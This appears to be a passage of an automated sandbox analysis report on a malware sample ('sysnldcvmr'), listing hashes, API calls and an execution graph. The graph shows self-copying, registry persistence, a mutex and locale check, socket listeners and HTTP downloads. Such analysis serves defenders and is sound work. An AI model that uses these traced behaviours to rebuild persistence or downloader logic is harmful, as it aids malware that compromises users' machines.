                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2223660684-0
                                                                                                                                                                                                                                                    • Opcode ID: 37f68c2e8ae6063ea859c376eb200881b9ae20d6250016d66435a6145ab54c34
                                                                                                                                                                                                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37f68c2e8ae6063ea859c376eb200881b9ae20d6250016d66435a6145ab54c34
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                                                                                                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                                                                                                                                                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                                                                    • String ID: %S%S
                                                                                                                                                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                                                                                                                                                    • Opcode ID: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
                                                                                                                                                                                                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90752405ea59c0d94f47ff5784e28f2eddf96679eb43bf22d5b787ed4233eba5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040D290
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040D2A9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 528846559-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                                                                    • Instruction ID: d1fe1851c25795fdacbee2e877de448503af208f5fff4c31293181607202da8f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11C574A04208EFCB04CF84D580E69B7B6FB89354F2081AAEC05AB385C735EE52DB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,00000000,?), ref: 00405EBF
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 469056452-0
                                                                                                                                                                                                                                                    • Opcode ID: 8ca99ff4882e63aa9735e8727bb02e2b1fcb4473e0a054d1445a25974175a9b9
                                                                                                                                                                                                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ca99ff4882e63aa9735e8727bb02e2b1fcb4473e0a054d1445a25974175a9b9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:0.1%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:1436
                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                    execution_graph 5816 40cf00 5822 4021b0 5816->5822 5819 40cf3f 5820 40cf25 WaitForSingleObject 5826 401600 5820->5826 5823 4021cf 5822->5823 5824 4021bb 5822->5824 5823->5819 5823->5820 5824->5823 5847 402020 5824->5847 5827 40160d 5826->5827 5846 401737 5826->5846 5828 401619 EnterCriticalSection 5827->5828 5827->5846 5829 4016b5 LeaveCriticalSection SetEvent 5828->5829 5832 401630 5828->5832 5830 4016d0 5829->5830 5831 4016e8 5829->5831 5833 4016d6 PostQueuedCompletionStatus 5830->5833 5834 40d2d0 11 API calls 5831->5834 5832->5829 5835 401641 InterlockedDecrement 5832->5835 5837 40165a InterlockedExchangeAdd 5832->5837 5843 4016a0 InterlockedDecrement 5832->5843 5833->5831 5833->5833 5836 4016f3 5834->5836 5835->5832 5838 40d410 6 API calls 5836->5838 5837->5832 5839 40166d InterlockedIncrement 5837->5839 5840 4016fc CloseHandle CloseHandle WSACloseEvent 5838->5840 5841 401c50 4 API calls 5839->5841 5868 40ab40 shutdown closesocket 5840->5868 5841->5832 5843->5832 5844 401724 DeleteCriticalSection 5845 40a1b0 _invalid_parameter 3 API calls 5844->5845 5845->5846 5846->5819 5848 409d90 7 API calls 5847->5848 5849 40202b 5848->5849 5850 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5849->5850 5856 4021a5 5849->5856 5851 402076 CreateIoCompletionPort 5850->5851 5852 40219f 5850->5852 5851->5852 5853 40208f 5851->5853 5854 401600 35 API calls 5852->5854 5855 40d130 8 API calls 5853->5855 5854->5856 5857 402094 5855->5857 5856->5823 5857->5852 5858 40209f WSASocketA 5857->5858 5858->5852 5859 4020bd setsockopt htons bind 5858->5859 5859->5852 5860 402126 listen 5859->5860 5860->5852 5861 40213a WSACreateEvent 5860->5861 5861->5852 5862 402147 WSAEventSelect 5861->5862 5862->5852 5866 402159 5862->5866 5863 40217f 5865 40d160 16 API calls 5863->5865 5864 40d160 16 API calls 5864->5866 5867 402194 5865->5867 5866->5863 5866->5864 5867->5823 5868->5844 5343 406045 5345 405fbe 5343->5345 5344 40604a LeaveCriticalSection 5345->5344 5346 40a220 8 API calls 5345->5346 5347 40601c 5346->5347 5347->5344 5348 407b49 5349 407b52 5348->5349 5350 407b61 34 API calls 5349->5350 5351 408996 5349->5351 5881 40a28e 5882 40a1b0 _invalid_parameter 3 API calls 5881->5882 5885 40a24d 5882->5885 5883 40a262 5884 409fa0 _invalid_parameter 7 API calls 5884->5885 5885->5883 5885->5884 5886 40a264 memcpy 5885->5886 5886->5885 4355 407590 Sleep CreateMutexA GetLastError 4356 4075c6 ExitProcess 4355->4356 4357 4075ce 6 API calls 4355->4357 4358 407673 4357->4358 4359 40795a Sleep 4357->4359 4411 40e730 GetLocaleInfoA strcmp 4358->4411 4418 40c7d0 4359->4418 4364 407ae1 4365 407975 9 API calls 4421 405bc0 InitializeCriticalSection CreateFileW 4365->4421 5236 407440 4365->5236 5243 405880 4365->5243 5252 406bc0 Sleep GetModuleFileNameW 4365->5252 4366 407680 ExitProcess 4367 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4369 407779 Sleep wsprintfW CopyFileW 4367->4369 4370 4076dc SetFileAttributesW RegOpenKeyExW 4367->4370 4371 4077c1 SetFileAttributesW RegOpenKeyExW 4369->4371 4372 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4369->4372 4370->4369 4374 407718 wcslen RegSetValueExW 4370->4374 4371->4372 4375 4077fd wcslen RegSetValueExW 4371->4375 4372->4359 4377 4078bd SetFileAttributesW RegOpenKeyExW 4372->4377 4374->4369 4378 40774d RegCloseKey 4374->4378 4375->4372 4379 407832 RegCloseKey 4375->4379 4377->4359 4381 4078f9 wcslen RegSetValueExW 4377->4381 4413 40e980 memset memset CreateProcessW 4378->4413 4383 40e980 6 API calls 4379->4383 4381->4359 4385 40792e RegCloseKey 4381->4385 4387 40784b 4383->4387 4389 40e980 6 API calls 4385->4389 4387->4372 4391 407856 ExitProcess 4387->4391 4388 407a2a CreateEventA 4451 40bf00 4388->4451 4393 407947 4389->4393 4390 407771 ExitProcess 4393->4359 4395 407952 ExitProcess 4393->4395 4402 40d160 16 API calls 4403 407a8a 4402->4403 4404 40d160 16 API calls 4403->4404 4405 407aa6 4404->4405 4406 40d160 16 API calls 4405->4406 4407 407ac2 4406->4407 4494 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4407->4494 4409 407ad2 4503 40d410 4409->4503 4412 407678 4411->4412 4412->4366 4412->4367 4414 40e9f1 ShellExecuteW 4413->4414 4415 40e9e2 Sleep 4413->4415 4416 407766 4414->4416 4417 40ea17 Sleep 4414->4417 4415->4416 4416->4369 4416->4390 4417->4416 4511 40c7a0 4418->4511 4422 405cd1 4421->4422 4423 405bf8 CreateFileMappingW 4421->4423 4433 40d640 CoInitializeEx 4422->4433 4423->4422 4424 405c19 MapViewOfFile 4423->4424 4424->4422 4425 405c38 GetFileSize 4424->4425 4429 405c4d 4425->4429 4426 405cc7 UnmapViewOfFile 4426->4422 4427 405c5c 4427->4426 4429->4426 4429->4427 4430 405c8c 4429->4430 4640 40c820 4429->4640 4647 405cf0 4429->4647 4431 40a1b0 _invalid_parameter 3 API calls 4430->4431 4431->4427 4951 40d710 socket 4433->4951 4435 407a25 4446 406fe0 CoInitializeEx SysAllocString 4435->4446 4436 40d6e8 4995 40a2d0 4436->4995 4439 40d6aa 4976 40aa80 htons 4439->4976 4440 40d660 4440->4435 4440->4436 4440->4439 4961 40d980 4440->4961 4445 40e470 24 API calls 4445->4436 4447 407002 4446->4447 4448 407018 CoUninitialize 4446->4448 5140 407030 4447->5140 4448->4388 5149 40bec0 4451->5149 4454 40bec0 3 API calls 4455 40bf1e 4454->4455 4456 40bec0 3 API calls 4455->4456 4457 40bf2e 4456->4457 4458 40bec0 3 API calls 4457->4458 4459 407a42 4458->4459 4460 40d130 4459->4460 4461 409d90 7 API calls 4460->4461 4462 40d13b 4461->4462 4463 407a4c 4462->4463 4464 40d147 InitializeCriticalSection 4462->4464 4465 40b2c0 InitializeCriticalSection 4463->4465 4464->4463 4477 40b2da 4465->4477 4466 40b309 CreateFileW 4468 40b330 CreateFileMappingW 4466->4468 4470 40b3de 4466->4470 4469 40b351 MapViewOfFile 4468->4469 4468->4470 4469->4470 4473 40b36c GetFileSize 4469->4473 5205 40ab60 EnterCriticalSection 4470->5205 4480 40b38b 4473->4480 4474 40b3f7 4475 40d160 16 API calls 4474->4475 4478 407a56 4475->4478 4476 40b3d4 UnmapViewOfFile 4476->4470 4477->4466 5156 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4477->5156 5157 40aea0 4477->5157 4482 40d160 4478->4482 4480->4476 4481 40aea0 31 API calls 4480->4481 5204 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4480->5204 4481->4480 4483 40d177 EnterCriticalSection 4482->4483 4484 407a6f 4482->4484 5232 40d250 4483->5232 4484->4402 4487 40d23b LeaveCriticalSection 4487->4484 4488 409fe0 9 API calls 4489 40d1b9 4488->4489 4489->4487 4490 40d1cb CreateThread 4489->4490 4490->4487 4491 40d1ee 4490->4491 4492 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4491->4492 4493 40d234 4491->4493 4492->4493 4493->4487 4495 40d306 InterlockedExchangeAdd 4494->4495 4496 40d3e9 GetCurrentThread SetThreadPriority 4494->4496 4495->4496 4501 40d320 4495->4501 4496->4409 4497 40d339 EnterCriticalSection 4497->4501 4498 40d3a7 LeaveCriticalSection 4498->4501 4502 40d3be 4498->4502 4499 40d383 WaitForSingleObject 4499->4501 4500 40d3dc Sleep 4500->4501 4501->4496 4501->4497 4501->4498 4501->4499 4501->4500 4501->4502 4502->4496 4504 40d492 4503->4504 4505 40d41c EnterCriticalSection 4503->4505 4504->4364 4506 40d438 LeaveCriticalSection DeleteCriticalSection 4505->4506 4508 40a1b0 _invalid_parameter 3 API calls 4506->4508 4509 40d486 4508->4509 4510 40a1b0 _invalid_parameter 3 API calls 4509->4510 4510->4504 4514 40c3f0 4511->4514 4515 40c40e 4514->4515 4518 40c423 4514->4518 4520 40c450 4515->4520 4517 40796a 4517->4364 4517->4365 4518->4517 4546 40c5d0 4518->4546 4521 40c479 4520->4521 4522 40c502 4520->4522 4545 40c4fa 4521->4545 4580 409d90 4521->4580 4524 409d90 7 API calls 4522->4524 4522->4545 4526 40c528 4524->4526 4528 402420 7 API calls 4526->4528 4526->4545 4530 40c555 4528->4530 4532 4024e0 10 API calls 4530->4532 4534 40c56f 4532->4534 4533 40c4cf 4535 402420 7 API calls 4533->4535 4537 402420 7 API calls 4534->4537 4536 40c4e0 4535->4536 4538 4024e0 10 API calls 4536->4538 4539 40c580 4537->4539 4538->4545 4540 4024e0 10 API calls 4539->4540 4541 40c59a 4540->4541 4542 402420 7 API calls 4541->4542 4543 40c5ab 4542->4543 4544 4024e0 10 API calls 4543->4544 4544->4545 4545->4517 4547 40c5f9 4546->4547 4548 40c6aa 4546->4548 4549 40c6a2 4547->4549 4550 409d90 7 API calls 4547->4550 4548->4549 4552 409d90 7 API calls 4548->4552 4549->4517 4551 40c60f 4550->4551 4551->4549 4554 402420 7 API calls 4551->4554 4553 40c6ce 4552->4553 4553->4549 4556 402420 7 API calls 4553->4556 4555 40c633 4554->4555 4557 409d90 7 API calls 4555->4557 4558 40c6f2 4556->4558 4559 40c642 4557->4559 4560 409d90 7 API calls 4558->4560 4561 4024e0 10 API calls 4559->4561 4562 40c701 4560->4562 4563 40c66b 4561->4563 4564 4024e0 10 API calls 4562->4564 4565 40a1b0 _invalid_parameter 3 API calls 4563->4565 4566 40c72a 4564->4566 4567 40c677 4565->4567 4568 40a1b0 _invalid_parameter 3 API calls 4566->4568 4569 402420 7 API calls 4567->4569 4570 40c736 4568->4570 4572 40c688 4569->4572 4571 402420 7 API calls 4570->4571 4573 40c747 4571->4573 4574 4024e0 10 API calls 4572->4574 4575 4024e0 10 API calls 4573->4575 4574->4549 4576 40c761 4575->4576 4577 402420 7 API calls 4576->4577 4578 40c772 4577->4578 4579 4024e0 10 API calls 4578->4579 4579->4549 4591 409db0 4580->4591 4583 402420 4612 409fa0 4583->4612 4588 4024e0 4619 402540 4588->4619 4590 4024ff __aligned_recalloc_base 4590->4533 4600 409e50 GetCurrentProcessId 4591->4600 4593 409dbb 4594 409dc7 _invalid_parameter 4593->4594 4601 409e70 4593->4601 4595 409d9e 4594->4595 4597 409de2 HeapAlloc 4594->4597 4595->4545 4595->4583 4597->4595 4598 409e09 _invalid_parameter 4597->4598 4598->4595 4599 409e24 memset 4598->4599 4599->4595 4600->4593 4609 409e50 GetCurrentProcessId 4601->4609 4603 409e79 4604 409e96 HeapCreate 4603->4604 4610 409ee0 GetProcessHeaps 4603->4610 4605 409eb0 HeapSetInformation GetCurrentProcessId 4604->4605 4606 409ed7 4604->4606 4605->4606 4606->4594 4609->4603 4611 409e8c 4610->4611 4611->4604 4611->4606 4613 409db0 _invalid_parameter 7 API calls 4612->4613 4614 40242b 4613->4614 4615 402820 4614->4615 4616 40282a 4615->4616 4617 409fa0 _invalid_parameter 7 API calls 4616->4617 4618 402438 4617->4618 4618->4588 4620 40258e 4619->4620 4622 402551 4619->4622 4621 409fa0 _invalid_parameter 7 API calls 4620->4621 4620->4622 4625 4025b2 _invalid_parameter 4621->4625 4622->4590 4623 4025e2 memcpy 4624 402606 _invalid_parameter 4623->4624 4627 40a1b0 _invalid_parameter 3 API calls 4624->4627 4625->4623 4629 40a1b0 4625->4629 4627->4622 4636 409e50 GetCurrentProcessId 4629->4636 4631 40a1bb 4632 4025df 4631->4632 4637 40a0f0 4631->4637 4632->4623 4635 40a1d7 HeapFree 4635->4632 4636->4631 4638 40a120 HeapValidate 4637->4638 4639 40a140 4637->4639 4638->4639 4639->4632 4639->4635 4657 40a220 4640->4657 4643 40c861 4643->4429 4646 40a1b0 _invalid_parameter 3 API calls 4646->4643 4870 409fe0 4647->4870 4650 405d2a memcpy 4651 40a220 8 API calls 4650->4651 4652 405d61 4651->4652 4880 40c190 4652->4880 4655 405de8 4655->4429 4658 40a24d 4657->4658 4659 409fa0 _invalid_parameter 7 API calls 4658->4659 4660 40a262 4658->4660 4661 40a264 memcpy 4658->4661 4659->4658 4660->4643 4662 40bd30 4660->4662 4661->4658 4670 40bd3a 4662->4670 4664 40bd59 4664->4643 4664->4646 4666 40bd71 memcmp 4666->4670 4667 40bd98 4668 40a1b0 _invalid_parameter 3 API calls 4667->4668 4668->4664 4669 40a1b0 _invalid_parameter 3 API calls 4669->4670 4670->4664 4670->4666 4670->4667 4670->4669 4671 40c220 4670->4671 4685 407af0 4670->4685 4672 40c22f _invalid_parameter 4671->4672 4673 409fa0 _invalid_parameter 7 API calls 4672->4673 4675 40c239 4672->4675 4674 40c2c8 4673->4674 4674->4675 4676 402420 7 API calls 4674->4676 4675->4670 4677 40c2dd 4676->4677 4678 402420 7 API calls 4677->4678 4679 40c2e5 4678->4679 4681 40c33d _invalid_parameter 4679->4681 4688 40c390 4679->4688 4693 402470 4681->4693 4684 402470 3 API calls 4684->4675 4801 409d10 4685->4801 4689 4024e0 10 API calls 4688->4689 4690 40c3a4 4689->4690 4699 4026f0 4690->4699 4692 40c3bc 4692->4679 4694 4024ce 4693->4694 4697 402484 _invalid_parameter 4693->4697 4694->4684 4695 4024ac 4696 40a1b0 _invalid_parameter 3 API calls 4695->4696 4696->4694 4697->4695 4698 40a1b0 _invalid_parameter 3 API calls 4697->4698 4698->4695 4702 402710 4699->4702 4701 40270a 4701->4692 4703 402724 4702->4703 4704 402540 __aligned_recalloc_base 10 API calls 4703->4704 4705 40276d 4704->4705 4706 402540 __aligned_recalloc_base 10 API calls 4705->4706 4707 40277d 4706->4707 4708 402540 __aligned_recalloc_base 10 API calls 4707->4708 4709 40278d 4708->4709 4710 402540 __aligned_recalloc_base 10 API calls 4709->4710 4711 40279d 4710->4711 4712 4027a6 4711->4712 4713 4027cf 4711->4713 4717 403e20 4712->4717 4734 403df0 4713->4734 4716 4027c7 __aligned_recalloc_base 4716->4701 4718 402820 _invalid_parameter 7 API calls 4717->4718 4719 403e37 4718->4719 4720 402820 _invalid_parameter 7 API calls 4719->4720 4721 403e46 4720->4721 4722 402820 _invalid_parameter 7 API calls 4721->4722 4723 403e55 4722->4723 4724 402820 _invalid_parameter 7 API calls 4723->4724 4733 403e64 _invalid_parameter __aligned_recalloc_base 4724->4733 4726 40400f _invalid_parameter 4727 402850 _invalid_parameter 3 API calls 4726->4727 4728 404035 _invalid_parameter 4726->4728 4727->4726 4729 402850 _invalid_parameter 3 API calls 4728->4729 4730 40405b _invalid_parameter 4728->4730 4729->4728 4731 402850 _invalid_parameter 3 API calls 4730->4731 4732 404081 4730->4732 4731->4730 4732->4716 4733->4726 4737 402850 4733->4737 4741 404090 4734->4741 4736 403e0c 4736->4716 4738 402866 4737->4738 4739 40285b 4737->4739 4738->4733 4740 40a1b0 _invalid_parameter 3 API calls 4739->4740 4740->4738 4742 4040a6 _invalid_parameter 4741->4742 4743 4040b8 _invalid_parameter 4742->4743 4744 4040dd 4742->4744 4746 404103 4742->4746 4743->4736 4771 403ca0 4744->4771 4747 40413d 4746->4747 4748 40415e 4746->4748 4781 404680 4747->4781 4750 402820 _invalid_parameter 7 API calls 4748->4750 4751 40416f 4750->4751 4752 402820 _invalid_parameter 7 API calls 4751->4752 4753 40417e 4752->4753 4754 402820 _invalid_parameter 7 API calls 4753->4754 4755 40418d 4754->4755 4756 402820 _invalid_parameter 7 API calls 4755->4756 4757 40419c 4756->4757 4794 403d70 4757->4794 4759 402820 _invalid_parameter 7 API calls 4760 4041ca _invalid_parameter 4759->4760 4760->4759 4761 404284 _invalid_parameter __aligned_recalloc_base 4760->4761 4762 402850 _invalid_parameter 3 API calls 4761->4762 4763 4045a3 _invalid_parameter 4761->4763 4762->4761 4764 402850 _invalid_parameter 3 API calls 4763->4764 4765 4045c9 _invalid_parameter 4763->4765 4764->4763 4766 402850 _invalid_parameter 3 API calls 4765->4766 4767 4045ef _invalid_parameter 4765->4767 4766->4765 4768 402850 _invalid_parameter 3 API calls 4767->4768 4769 404615 _invalid_parameter 4767->4769 4768->4767 4769->4743 4770 402850 _invalid_parameter 3 API calls 4769->4770 4770->4769 4772 